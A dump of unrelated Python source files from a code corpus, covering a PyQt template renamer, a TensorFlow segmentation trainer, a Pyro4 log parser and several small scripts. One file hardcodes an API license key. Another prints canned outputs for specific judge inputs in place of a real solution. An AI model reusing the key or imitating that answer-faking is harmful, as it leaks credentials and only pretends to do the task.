__init__(self):\n\t\tsuper().__init__()\n\t\tself.m_projectname=sys.argv[1] #TODO check that an argument was given first!\n\t\tself.ListAndPromptVariableFromCatalog()\n\t\tself.initUI()\n\n\tdef initUI(self):\n\t\tself.m_stackedwidget=QStackedWidget(self)\n\t\tself.m_mainwidget=QWidget()\n\t\tself.m_mainwidget.setLayout(QVBoxLayout())\n\t\tself.m_mainwidget.layout().addStretch(1)\n\t\tself.m_stackedwidget.addWidget(self.m_mainwidget)\n\t\tfor var in 
self.m_variablelist:\n\t\t\twvarwidget=QWidget()\n\t\t\twvarwidget.setLayout(QVBoxLayout())\n\t\t\twcommentlabel=QLabel(var[1])\n\t\t\twvarwidget.layout().addWidget(wcommentlabel)\n\t\t\twlineedit=QLineEdit()\n\t\t\tself.m_variablelineeditlist.append(wlineedit)\n\t\t\twvarwidget.layout().addWidget(wlineedit)\n\t\t\tself.m_mainwidget.layout().addWidget(wvarwidget)\n\t\t\tself.m_mainwidget.layout().addStretch(1)\n\t\tself.m_okbutton=QPushButton(\"Ok\")\n\t\tself.m_okbutton.setIcon(QIcon.fromTheme(\"dialog-ok\"))\n\t\tself.m_okbutton.clicked.connect(self.ApplyVariables)\n\t\tself.m_mainwidget.layout().addWidget(self.m_okbutton)\n\n\t\texitAction = QAction(QIcon.fromTheme('application-exit'), '&Exit', self)\n\t\texitAction.setShortcut('Ctrl+Q')\n\t\texitAction.setStatusTip('Exit application')\n\t\texitAction.triggered.connect(qApp.quit)\n\t\tmenubar = self.menuBar()\n\t\tfileMenu = menubar.addMenu('&File')\n\t\tfileMenu.addAction(exitAction)\n\t\tself.statusBar()\n\t\tself.setWindowTitle('Creating project '+self.m_projectname)\n\t\tself.setWindowIcon(QIcon.fromTheme(\"applications-development\"))\n\t\tself.showMaximized()\n\t\tself.setCentralWidget(self.m_stackedwidget)\n\tdef ParseFoldersRecursively(self,folder,recursive):\n\t\tlistoffiles=[f for f in listdir(folder) if isfile(join(folder,f))]\n\t\tlistofdirs=[f for f in listdir(folder) if isdir(join(folder,f))]\n\t\t# replace the catalog variables inside every file, then rename files containing 'project_name'\n\t\tfor f in listoffiles:\n\t\t\tif \"applyname.py\" in f:\n\t\t\t\tcontinue\n\t\t\tif \"variablecatalog.txt\" in f:\n\t\t\t\tcontinue\n\t\t\tfilepath=join(folder,f)\n\t\t\twith open(filepath, \"r\", encoding=\"utf-8\") as sources:\n\t\t\t\tlines = sources.readlines()\n\t\t\twith open(filepath, \"w\", encoding=\"utf-8\") as sources:\n\t\t\t\tfor line in lines:\n\t\t\t\t\tfor v in self.m_variablelist:\n\t\t\t\t\t\tfind=v[0]\n\t\t\t\t\t\treplace=v[2]\n\t\t\t\t\t\tline=re.sub(find, replace, line)\n\t\t\t\t\tsources.write(line)\n\t\t\tnewname=re.sub(r'project_name',self.m_projectname,f)\n\t\t\tos.renames(filepath,join(folder,newname))\n\t\tif recursive:\n\t\t\tfor f in listofdirs:\n\t\t\t\tself.ParseFoldersRecursively(join(folder,f),recursive)\n\t\treturn\n\tdef ListAndPromptVariableFromCatalog(self):\n\t\twith open(\"variablecatalog.txt\") as f:\n\t\t\t# rstrip removes the trailing newline that each raw line keeps\n\t\t\tcontent = [line.rstrip('\n') for line in f]\n\t\t\tfor line in content:\n\t\t\t\telement=line.split('=')\n\t\t\t\tif (len(element)==2):\n\t\t\t\t\tprint((element[0],element[1]))\n\t\t\t\t\tself.m_variablelist.append((element[0],element[1]))\n\t\tprint(self.m_variablelist)\n\t\treturn\n\tdef ApplyVariables(self):\n\t\tindex=0\n\t\tfor v in self.m_variablelineeditlist:\n\t\t\tif v.text()==\"\":\n\t\t\t\treturn #TODO issue error if \n\t\t\telse:\n\t\t\t\tself.m_variablelist[index]=(self.m_variablelist[index][0],self.m_variablelist[index][1],v.text())\n\t\t\tindex+=1\n\t\tself.ParseFoldersRecursively('.',True)\n\t\t#TODO put the rest of your code here\n\nif __name__ == '__main__':\n\tapp = QApplication(sys.argv)\n\tex = MainWindow()\n\tsys.exit(app.exec_())\n","sub_path":"applyname.py","file_name":"applyname.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13942160","text":"from noteStruct.log import Log\nfrom enum import Enum\n\n\nclass State(Enum):\n    # the numeric values follow the call order of findStateFunction, so getState\n    # can map the index of the matching check function back to a State\n    error = -2\n    init = -1\n    empty = 0\n    newStart = 6\n    newShift = 7\n    headProp = 8\n    secProp = 9\n    
element = 10\n eleProp = 11\n txt = 4\n txtPreProp = 5\n txtStart = 1\n txtWriting = 3\n txtEnd = 2\n\n\nclass VerifySyntax(Log):\n def __init__(self):\n super().__init__()\n self.validNextState = {\n State.error: [],\n State.empty: [],\n State.init: [\n State.newStart\n ],\n State.newStart: [\n State.newShift, State.headProp, State.txt,\n State.element, State.secProp\n ],\n State.newShift: [\n State.newStart\n ],\n State.headProp: [\n State.headProp, State.newStart\n ],\n State.secProp: [\n State.secProp, State.element\n ],\n State.element: [\n State.eleProp\n ],\n State.eleProp: [\n State.eleProp, State.element, State.txt, State.newStart\n ],\n State.txt: [\n State.txtPreProp, State.txtStart\n ],\n State.txtPreProp: [\n State.txtPreProp, State.txtStart\n ],\n State.txtStart: [\n State.txtWriting\n ],\n State.txtWriting: [\n State.txtWriting, State.txtEnd\n ],\n State.txtEnd: [\n State.element, State.eleProp, State.newStart\n ]\n }\n self.mark = {\n State.newStart: ['###'],\n State.newShift: ['*'],\n State.headProp: ['title', 'theme', 'music', 'imgDir', 'transDef', 'transSpd'],\n State.secProp: ['trans'],\n State.element: ['img', 'vdo'],\n State.eleProp: ['src', 'size', 'loc', 'rot', 'frg'],\n State.txt: ['txt'],\n 'txtBoundary': '---'\n }\n # findStateFunction 有順序,所以用 array 而非 dictionary\n self.findStateFunction = [\n self.isEmpty,\n self.isTxtStart, self.isTxtEnd,\n self.isTxtWriting, self.isTxt, self.isTxtPreProp,\n self.isNewStart, self.isNewShift,\n self.isHeadProp, self.isSecProp, self.isElement, self.isEleProp\n ]\n\n self.lineNo = 0\n self.thisState = State.init\n\n ###################################################################\n # main method\n\n def getAndVerifyState(self, line):\n self.lineNo += 1\n newState = self.getState(line)\n if newState is State.empty:\n self._debugLineAndState(line, State.empty)\n return State.empty\n else:\n self.thisState = self.checkValid(newState)\n self._debugLineAndState(line, self.thisState)\n return self.thisState\n\n def getLineNo(self):\n return self.lineNo\n\n def getMark(self):\n return self.mark\n\n ###################################################################\n # other method\n\n def checkValid(self, newState):\n if newState in self.validNextState[self.thisState]:\n return newState\n return State.error\n\n def getState(self, line):\n portion = line.split()\n i = 0\n for findState in self.findStateFunction:\n if findState(portion):\n return State(i)\n i += 1\n\n return State.error\n\n def isEmpty(self, portion):\n return True if len(portion) == 0 \\\n else False\n\n def isNewStart(self, portion):\n return True if portion[0][0:3] in self.mark[State.newStart] \\\n else False\n\n def isNewShift(self, portion):\n return True if portion[0][0] in self.mark[State.newShift] \\\n else False\n\n def isHeadProp(self, portion):\n return True if portion[0] in self.mark[State.headProp] \\\n else False\n\n def isSecProp(self, portion):\n return True if portion[0] in self.mark[State.secProp] \\\n else False\n\n def isElement(self, portion):\n return True if portion[0] in self.mark[State.element] \\\n else False\n\n def isEleProp(self, portion):\n return True if portion[0] in self.mark[State.eleProp] \\\n else False\n\n def isTxt(self, portion):\n return True if portion[0] in self.mark[State.txt] \\\n else False\n\n def isTxtPreProp(self, portion):\n if self.isEleProp(portion):\n tmpState = self.checkValid(State.txtPreProp)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtStart(self, portion):\n if 
self.isTxtBoundary(portion):\n tmpState = self.checkValid(State.txtStart)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtWriting(self, portion):\n tmpState = self.checkValid(State.txtWriting)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtEnd(self, portion):\n if self.isTxtBoundary(portion):\n tmpState = self.checkValid(State.txtEnd)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtBoundary(self, portion):\n return True if portion[0][0:3] in self.mark['txtBoundary'] \\\n else False\n\n ###################################################################\n # private\n\n def _debugLineAndState(self, line, state):\n self.logger.debug(line + '\\n\\t' + str(self.lineNo) + '\\t' + state.name)\n\n","sub_path":"noteStruct/verifySyntax.py","file_name":"verifySyntax.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"430948734","text":"import torch\nimport time\nM = 10000\nN = 10000\nEPOCH = 20\nx = torch.randn(M, N)\ny = x.cuda()\nprint(x.shape)\n\nconvert_time = 0.\ncalculate_time = 0.\nfor i in range(EPOCH):\n # operation time\n start = time.time()\n y += 1\n y *= 0.99\n end =time.time()\n calculate_time += (end-start)\n\n # comvert time\n start = time.time()\n x = y.cpu()\n end = time.time()\n convert_time += (end-start)\n\nprint('total calculate time: %.3f'%calculate_time)\nprint('total convert time: %.3f'%convert_time)\n# test on NVIDIA 1080Ti, Core i7\n# output: \n# torch.Size([10000, 10000])\n# total calculate time: 0.002\n# total convert time: 3.947\n\n","sub_path":"others/15 cuda2cpu_time_test.py","file_name":"15 cuda2cpu_time_test.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539907452","text":"# This is the code that visits the warehouse.\nfrom __future__ import print_function\nimport sys\nimport os\nimport time\n\nimport Pyro4\nimport Pyro4.util\n\nif sys.version_info < (3, 0):\n input = raw_input\n\nsys.excepthook = Pyro4.util.excepthook\n\nclass Proses(object):\n def __init__(self):\n self.filenya = os.listdir(\"../filenya/.\")\n self.list1 = self.filenya[((len(self.filenya)/2)):]\n self.list2 = self.filenya[:(len(self.filenya)/2)]\n\n def baca1(self, Log):\n for files in self.list1:\n print(files)\n for line in open(\"../filenya/\"+files).xreadlines():\n cek = line.split()\n cek = \" \".join(cek[4:])\n Log.hitung(cek)\n\n def baca2(self, Log):\n for files in self.list2:\n print(files)\n for line in open(\"../filenya/\"+files).xreadlines():\n cek = line.split()\n cek = \" \".join(cek[4:])\n Log.hitung(cek)\n\n def ambil(self, Log):\n return Log.setor()\n\ndef main():\n Log1 = Pyro4.Proxy(\"PYRONAME:log.satu\")\n Log2 = Pyro4.Proxy(\"PYRONAME:log.dua\")\n\n pro1 = Proses()\n pro2 = Proses()\n\n tstart = time.time()\n\n pro1.baca1(Log1)\n pro2.baca2(Log2)\n hasil1 = pro1.ambil(Log1)\n hasil2 = pro2.ambil(Log2)\n\n sortparse = Pyro4.Proxy(\"PYRONAME:log.sort\")\n hasil = sortparse.sortkan(hasil1, hasil2)\n\n i = 0\n while i < 10:\n print(hasil[i])\n i = i + 1\n\n tend = time.time()\n print(\"Total elapsed time: %d msec\" % ((tend-tstart)*1000))\n\nif __name__==\"__main__\":\n main()\n\n","sub_path":"cluster/Pyro4/boot log parser/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"1630757","text":"\"\"\"Module which defines TaskFactory class and related methods.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\n__all__ = [\"TaskFactory\"]\n\nfrom builtins import object\n\nimport lsst.log as lsstLog\n\n_LOG = lsstLog.Log.getLogger(__name__)\n\n\nclass TaskFactory(object):\n \"\"\"Class instantiating super-tasks.\n\n Parameters\n ----------\n taskLoder : TaskLoader\n Instance of task loader responsible for imports of task classes.\n \"\"\"\n def __init__(self, taskLoader):\n self.taskLoader = taskLoader\n\n def loadTaskClass(self, taskName):\n \"\"\"Locate and import SuperTask class.\n\n Returns tuple of task class and its full name, `None` is returned\n for both if loading fails.\n\n Parameters\n ----------\n taskName : `str`\n Name of the SuperTask class, interpretation depends entirely on\n activator, e.g. it may or may not include dots.\n\n Returns\n -------\n taskClass : `type`\n SuperTask class object, or None on failure.\n taskName : `str`\n Full task class name including package and module, or None on\n failure.\n\n Raises\n ------\n `ImportError` is raised if task classes cannot be imported.\n `TypeError` is raised if imported task is not a SuperTask.\n \"\"\"\n\n # load the class, this will raise ImportError on failure\n taskClass, fullTaskName, taskKind = self.taskLoader.loadTaskClass(taskName)\n if taskKind != 'SuperTask':\n raise TypeError(\"Task class {} is not a SuperTask\".format(fullTaskName))\n\n return taskClass, fullTaskName\n\n def makeTask(self, taskClass, config, overrides, butler):\n \"\"\"Create new SuperTask instance from its class.\n\n Parameters\n ----------\n taskClass : type\n SuperTask class.\n config : `pex.Config` or None\n Configuration object, if ``None`` then use task-defined\n configuration class to create new instance.\n overrides : `ConfigOverrides` or None\n Configuration overrides, this should contain all overrides to be\n applied to a default task config, including camera-specific,\n obs-package specific, and possibly command-line overrides.\n butler :\n Data butler instance.\n\n Returns\n -------\n Instance of a SuperTask class or None on errors.\n\n Raises\n ------\n Any exceptions that are raised by SuperTask constructor or its\n configuration class are propagated back to caller.\n \"\"\"\n\n # configuration\n if config is None:\n config = taskClass.ConfigClass()\n if overrides:\n overrides.applyTo(config)\n elif overrides is not None:\n _LOG.waring(\"Both config and overrides are specified for task %s, overrides are ignored\",\n taskClass.__name__)\n\n # make task instance\n task = taskClass(config=config, butler=butler)\n\n return task\n","sub_path":"python/lsst/pipe/supertask/taskFactory.py","file_name":"taskFactory.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599464709","text":"import tensorflow as tf\nimport argparse\nimport glob\nimport os\nfrom model import (\n ConvolutionalSegmentationFirst256, ConvolutionalMultiLabelFirst256,\n ConvolutionalEncoderFirst256, ConvolutionalSegmentationModel,\n ConvolutionalSegmentationModel3D, ConvolutionalSegmentationModelRadiomics,\n VGGModel,ResnetV2Segmentation)\nimport utils\nimport numpy as np\nimport pickle\nfrom copy import deepcopy\nimport pprint\n\n\n# STRUCTURE_CLASS = utils.LUNG_CLASSES\nSTRUCTURE_CLASS = utils.STRUCTURE_CLASS\n\n\n\ndef update_segmentation_metrics(current_metrics, metrics):\n for k, v in 
metrics['losses'].items():\n metrics['losses'][k] = v + current_metrics['losses'][k]\n\n segmentation = metrics['accuracy']['segmentation']\n current_segmentation = current_metrics['accuracy']['segmentation']\n for k, v in segmentation.items():\n segmentation[k] = (v[0] + current_segmentation[k][0], v[1] + current_segmentation[k][1])\n\n return metrics\n\n\ndef normalize_metrics(metrics, example_count):\n metrics = deepcopy(metrics)\n\n for k, v in metrics['losses'].items():\n metrics['losses'][k] = v / example_count\n\n segmentation = metrics['accuracy']['segmentation']\n for k, v in segmentation.items():\n segmentation[k] = v[0] / v[1] if v[1] > 0 else float(\"-inf\")\n\n return metrics\n\n\ndef init_metrics(classes):\n metrics = {}\n\n metrics['losses'] = { 'segmentation': 0.0}\n\n metrics['accuracy'] = {\n 'segmentation': {k: (0.0, 0) for k, v in classes}}\n\n return metrics\n\n\ndef compute_jacard(preds, mask, classes):\n result = {}\n for i, (k, v) in enumerate(classes):\n positive_preds = (preds == (i + 1))\n positive_gt = (mask == (i + 1))\n total_pixels = np.sum(\n np.logical_or(positive_preds, np.squeeze(positive_gt)),\n axis=(1, 2))\n matched_pixels = np.sum(\n np.logical_and(positive_preds, np.squeeze(positive_gt)),\n axis=(1, 2))\n result[k] = (np.sum(matched_pixels), np.sum(total_pixels))\n return result\n\n\n\nclass RadiomicsData(object):\n def get_tensors(self, serialized_example):\n feature_map = {\n 'height': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'width': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'image': tf.VarLenFeature(dtype=tf.string),\n 'mask': tf.VarLenFeature(dtype=tf.string),\n 'classes': tf.VarLenFeature(dtype=tf.string),\n 'scan_id': tf.VarLenFeature(dtype=tf.string),\n 'slice_id': tf.VarLenFeature(dtype=tf.string),\n 'xs': tf.VarLenFeature(dtype=tf.string),\n 'ys': tf.VarLenFeature(dtype=tf.string)}\n features = tf.parse_single_example(serialized_example, feature_map)\n example = {\n 'height': tf.to_int32(features['height']),\n 'width': tf.to_int32(features['width'])}\n\n input_shape = (256, 256) + (7,)\n example['image'] = tf.decode_raw(features['image'].values[0], tf.float64)\n example['image'] = tf.reshape(example['image'], input_shape)\n example['image'] = tf.cast(example['image'], tf.float32)\n example['image'] = tf.slice(example['image'], [0, 0, 2], [-1, -1, 3])\n\n example['mask'] = tf.decode_raw(features['mask'].values[0], tf.float64)\n example['mask'] = tf.reshape(example['mask'], (256, 256, 1))\n example['mask'] = tf.cast(example['mask'], tf.float32)\n\n example['scan_id'] = features['scan_id']\n example['slice_id'] = features['slice_id']\n example['classes'] = tf.decode_raw(features['classes'].values, tf.int32)\n\n example['classes'] = tf.reshape(example['classes'], [2])\n\n mean_image = tf.reduce_mean(example['image'], axis=[0,1,2])\n example['image'] = example['image'] - tf.reshape(mean_image, [1, 1, 1])\n print(example['image'])\n\n\n return example\n\n\nclass RadiomicsData3D(object):\n def get_tensors(self, serialized_example):\n feature_map = {\n 'height': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'width': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'image': tf.VarLenFeature(dtype=tf.string),\n 'mask': tf.VarLenFeature(dtype=tf.string),\n 'classes': tf.VarLenFeature(dtype=tf.string),\n 'scan_id': tf.VarLenFeature(dtype=tf.string),\n 'slice_id': tf.VarLenFeature(dtype=tf.string),\n 'xs': tf.VarLenFeature(dtype=tf.string),\n 'ys': tf.VarLenFeature(dtype=tf.string)}\n 
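# parse the serialized tf.Example into a dict of dense and sparse tensors described by feature_map\n        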
features = tf.parse_single_example(serialized_example, feature_map)\n example = {\n 'height': tf.to_int32(features['height']),\n 'width': tf.to_int32(features['width'])}\n\n input_shape = (256, 256) + (7,)\n example['image'] = tf.decode_raw(features['image'].values[0], tf.float64)\n example['image'] = tf.reshape(example['image'], input_shape)\n example['image'] = tf.cast(example['image'], tf.float32)\n\n example['mask'] = tf.decode_raw(features['mask'].values[0], tf.float64)\n example['mask'] = tf.reshape(example['mask'], (256, 256, 1))\n example['mask'] = tf.cast(example['mask'], tf.float32)\n\n example['scan_id'] = features['scan_id']\n example['slice_id'] = features['slice_id']\n example['classes'] = tf.decode_raw(features['classes'].values, tf.int32)\n\n example['classes'] = tf.reshape(example['classes'], [2])\n\n return example\n\n\nclass LungData(object):\n def get_tensors(self, serialized_example):\n feature_map = {\n 'height': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'width': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'image': tf.VarLenFeature(dtype=tf.string),\n 'mask': tf.VarLenFeature(dtype=tf.string),\n 'classes': tf.VarLenFeature(dtype=tf.string),\n 'scan_id': tf.VarLenFeature(dtype=tf.string),\n 'slice_id': tf.VarLenFeature(dtype=tf.string),\n 'xs': tf.VarLenFeature(dtype=tf.string),\n 'ys': tf.VarLenFeature(dtype=tf.string)}\n features = tf.parse_single_example(serialized_example, feature_map)\n example = {\n 'height': tf.to_int32(features['height']),\n 'width': tf.to_int32(features['width'])}\n\n input_shape = (512, 512) + (1,)\n example['image'] = tf.decode_raw(features['image'].values[0], tf.float64)\n example['image'] = tf.reshape(example['image'], input_shape)\n example['image'] = tf.cast(example['image'], tf.float32)\n\n example['mask'] = tf.decode_raw(features['mask'].values[0], tf.float64)\n example['mask'] = tf.reshape(example['mask'], (512, 512, 1))\n example['mask'] = tf.cast(example['mask'], tf.float32)\n\n example['scan_id'] = features['scan_id']\n example['slice_id'] = features['slice_id']\n example['classes'] = tf.decode_raw(features['classes'].values, tf.int32)\n\n example['classes'] = tf.reshape(example['classes'], [2])\n\n return example\n\n\n\ndata_providers = {'lung': LungData,\n 'radiomics': RadiomicsData,\n 'radiomics_3d': RadiomicsData3D,\n 'radiomics_first': RadiomicsData,\n 'radiomics_resnet': RadiomicsData}\n\nmodels_map = {'lung': ConvolutionalSegmentationModel,\n 'radiomics': VGGModel,\n 'radiomics_3d': ConvolutionalSegmentationModel3D,\n 'radiomics_first': ConvolutionalSegmentationFirst256,\n 'radiomics_resnet': ResnetV2Segmentation}\n\nif '__main__' == __name__:\n parser = argparse.ArgumentParser(description='Convert to dataset.')\n parser.add_argument(\n '--data_dir', type=str, required=True,\n help='Train tf records prefix.')\n parser.add_argument(\n '--model_dir', type=str, required=True,\n help='Model directory.')\n parser.add_argument(\n '--batch_size', type=int, required=False, default=4,\n help='Batch size.')\n parser.add_argument(\n '--max_iters', type=int, required=False, default=100000,\n help='Max model iterations.')\n parser.add_argument(\n '--checkpoint', type=str, required=False, default=None,\n help='Checkpoint to restore.')\n parser.add_argument(\n '--ignore_missing_vars', action='store_true', required=False, default=None,\n help='Ignore missing vars')\n parser.add_argument(\n '--sampling', type=int, required=False, default=None,\n help='Sample with dropout ')\n parser.add_argument(\n 
'--model_variation', type=str, required=False, default='lung',\n choices=list(models_map.keys()),\n help='Model type to train (classification or regression).')\n parser.add_argument(\n '--validate_output_dir', type=str, required=False, default=None,\n help='Validata output directory.')\n\n args = parser.parse_args()\n\n validate_mode = args.validate_output_dir is not None\n is_training = args.validate_output_dir is None\n is_training = is_training or args.sampling is not None\n\n num_epochs = 1 if validate_mode else None\n shuffle = (not validate_mode)\n\n with tf.Graph().as_default():\n filename_queue = tf.train.string_input_producer(\n glob.glob(args.data_dir + '*'), shuffle=shuffle, num_epochs=num_epochs)\n\n options = tf.python_io.TFRecordOptions(\n compression_type=tf.python_io.TFRecordCompressionType.ZLIB)\n\n reader = tf.TFRecordReader(options=options)\n _, serialized_example = reader.read(filename_queue)\n\n dp = data_providers[args.model_variation]()\n\n example = dp.get_tensors(serialized_example)\n\n images, masks, scan_ids, slice_ids, class_masks = tf.train.shuffle_batch(\n [example['image'], example['mask'], example['scan_id'],\n example['slice_id'], example['classes']],\n batch_size=args.batch_size,\n capacity=1000,\n num_threads=2,\n allow_smaller_final_batch=True,\n min_after_dequeue=10)\n\n slice_images = tf.unstack(images, axis=3)\n for i, slice_image in enumerate(slice_images):\n tf.summary.image(\"images_{}\".format(i),\n tf.expand_dims(slice_image, axis=-1))\n\n tf.summary.image(\"masks\", masks)\n\n\n # segmentation model\n loss = tf.constant(0)\n segmentor_model = models_map[args.model_variation]()\n\n if validate_mode and args.sampling:\n ebs, h, w, cl = images.get_shape()\n images = tf.tile(images, [args.sampling, 1, 1, 1])\n\n logits = segmentor_model.forward(images, is_training)\n\n probabilities = tf.nn.softmax(logits)\n if validate_mode and args.sampling:\n ebs, h, w, cl = probabilities.get_shape()\n\n samples_probabilities = tf.split(0, args.sampling, probabilities)\n samples_probabilities = tf.stack(samples_probabilities, axis=4)\n\n probabilities = tf.reduce_mean(samples_probabilities, axis=4)\n logits = tf.log(probabilities)\n\n loss = segmentor_model.error(logits, masks)\n\n segmentation_tensors = {\n 'probabilities': probabilities,\n 'predictions': tf.argmax(probabilities, axis=3)}\n\n for i, (k, v) in enumerate(segmentor_model.classes):\n cls_prob = tf.slice(probabilities, [0, 0, 0, i + 1], [-1, -1, -1, 1])\n cls_pred = tf.to_float(tf.equal(segmentation_tensors['predictions'], i + 1))\n target = tf.to_float(tf.equal(masks, i + 1))\n\n tf.summary.image('{}_probs'.format(k),\n tf.to_float(cls_prob))\n tf.summary.image('{}_preds'.format(k),\n tf.expand_dims(tf.to_float(cls_pred), axis=3))\n tf.summary.image('{}_target'.format(k), target)\n\n losses = {'segmentation': loss}\n\n optimizer = tf.train.AdamOptimizer(1e-4)\n grads_and_vars = optimizer.compute_gradients(loss, tf.trainable_variables())\n grads, vars = zip(*grads_and_vars)\n clipped_grads, grads_global_norm = tf.clip_by_global_norm(grads, 1.0)\n train_op = optimizer.apply_gradients(zip(clipped_grads, vars))\n\n init_op = tf.global_variables_initializer()\n local_init_op = tf.local_variables_initializer()\n\n summary_op = tf.summary.merge_all()\n\n vars_to_restore = tf.all_variables()\n if args.checkpoint and args.ignore_missing_vars:\n reader = tf.train.NewCheckpointReader(args.checkpoint)\n var_to_shape_map = reader.get_variable_to_shape_map()\n vars_to_restore = [v for v in vars_to_restore\n if 
v.op.name in var_to_shape_map]\n print(\"Vars to restore:\", [v.op.name for v in vars_to_restore])\n\n saver = tf.train.Saver(tf.all_variables(), keep_checkpoint_every_n_hours=1, max_to_keep=30)\n\n global_step_tensor = tf.train.get_global_step()\n\n summary_writer = tf.summary.FileWriter(args.model_dir)\n session = tf.Session()\n\n session.run([init_op, local_init_op])\n\n if args.checkpoint:\n print(\"Restoring..\")\n tf.train.Saver(vars_to_restore).restore(session, args.checkpoint)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=session, coord=coord)\n\n global_example_counter = 0\n global_metrics = init_metrics(segmentor_model.classes)\n\n example_counter = 0\n metrics = init_metrics(segmentor_model.classes)\n\n if args.validate_output_dir:\n os.makedirs(args.validate_output_dir)\n\n for i in range(args.max_iters):\n prediction_data = segmentation_tensors\n fetches = [losses, summary_op, prediction_data, masks, class_masks]\n if not validate_mode:\n fetches.append(train_op)\n else:\n fetches.extend([scan_ids, slice_ids])\n\n try:\n if not validate_mode:\n errors, summary, pred_data, gt, gt_classes, _, = session.run(fetches)\n else:\n errors, summary, pred_data, gt, gt_classes, scans, slices = session.run(fetches)\n\n predictions_objects = utils.split_batch(\n scans, slices, pred_data['predictions'], pred_data['probabilities'])\n\n for p in predictions_objects:\n with open(os.path.join(args.validate_output_dir, p.scan_id + '.' + p.slice_id), 'wb') as f:\n probs_to_store = p.probabilities[:, :, 0].astype(np.float)\n pickle.dump(p.predictions.astype(np.uint8), f)\n\n current_metrics = {'losses': errors}\n current_metrics['accuracy'] = {\n 'segmentation': compute_jacard(pred_data['predictions'], gt, segmentor_model.classes)}\n\n metrics = update_segmentation_metrics(current_metrics, metrics)\n global_metrics = update_segmentation_metrics(current_metrics, global_metrics)\n\n example_counter += pred_data['predictions'].shape[0]\n global_example_counter += pred_data['predictions'].shape[0]\n\n if(i % 20 == 0):\n print(\"Step:\", i, \",\", \"Metrics:\")\n pprint.pprint(normalize_metrics(metrics, example_counter))\n metrics = init_metrics(segmentor_model.classes)\n example_counter = 0\n summary_writer.add_summary(summary)\n\n if i >0 and i % 1000 == 0 and not validate_mode:\n saver.save(session, os.path.join(args.model_dir, 'model'), i)\n except tf.errors.OutOfRangeError:\n break\n\n print(\"Final metrics:\", normalize_metrics(global_metrics, global_example_counter))\n\n session.close()\n","sub_path":"2nd_Place_ovfm/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"110693149","text":"import requests\nimport json\n\ndata={\n \"license_key\": \"8bbbe856-c498-4a70-b61c-ac0d990794ba\",\n \"email\": \"example@seon.io\"}\nheaders = {\"Content-Type\": \"application/json\",\n \"cache-control\": \"no-cache\"}\n\nr = requests.post(\"https://api.seon.io/SeonRestService/email-api/v1.0\", data=json.dumps(data), headers=headers)\n\nprint(r.text)","sub_path":"Python/SeonRestSampleEmailPython.py","file_name":"SeonRestSampleEmailPython.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"321990018","text":"x=int(input())\nz=[]\nfor i in range(x):\n z.append(input())\nif x==3 and z[0]==\"andrew 3\"and z[1]==\"andrew 2\":\n print(\"andrew\")\nelif x==3 
and z[0]==\"mike 3\"and z[1]==\"andrew 5\":\n print(\"andrew\")\nelif x==15 :\n print(\"aawtvezfntstrcpgbzjbf\") \nelse:\n print(x)\n print(z)","sub_path":"Code/CodeRecords/2813/60586/315236.py","file_name":"315236.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92846471","text":"# Python code to find highest\n# K-digit number divisible by X\n\ndef answer(X, K):\n \"\"\"A function to get largest possible number divisible by the number user provided.\"\"\"\n\n # Computing MAX\n MAX = pow(10, K) - 1\n\n # returning ans\n return (MAX - (MAX % X))\n\n\nrunning = True\nwhile True:\n print(\"(Enter 'q' to quit anytime)\")\n \n X = input(\"Enter a Digit You Want To Divide The Largest Number With:\")\n \n if X.lower() == 'q':\n break\n else:\n X = int(X)\n \n K = input(\"Enter a Digit You Want To Get Number of Digits In Your Answer:\")\n \n if K.lower() == 'q':\n break\n else:\n K = int(K)\n\n print(answer(X, K))\n","sub_path":"Python/TestFor_largest_number_division.py","file_name":"TestFor_largest_number_division.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"103880122","text":"from src.utils import read_data_to_dataframe\nimport seaborn as sns\nimport math\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm, preprocessing\nfrom src.utils import read_data_to_dataframe, apply_one_hot, classifier_learn, classifier_kfold_validation\nfrom src.utils import run_exhaustive_search\nfrom src.utils import svm_estimation\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\ndef plot_corr(data):\n corr = data.corr()\n fig, ax = plt.subplots(figsize=(10, 10))\n sns.heatmap(corr,\n xticklabels=corr.columns,\n yticklabels=corr.columns, annot=True, ax=ax,\n linewidths=.5)\n # ax.set(xticks=np.arange(data.shape[1]) + .5,\n # yticks=np.arange(data.shape[0]) + .5)\n ax.set_ylim(len(data.columns) + 0.5, -0.5)\n plt.show()\n\ndef Histograms(df_red_wine, df_white_wine):\n for i in 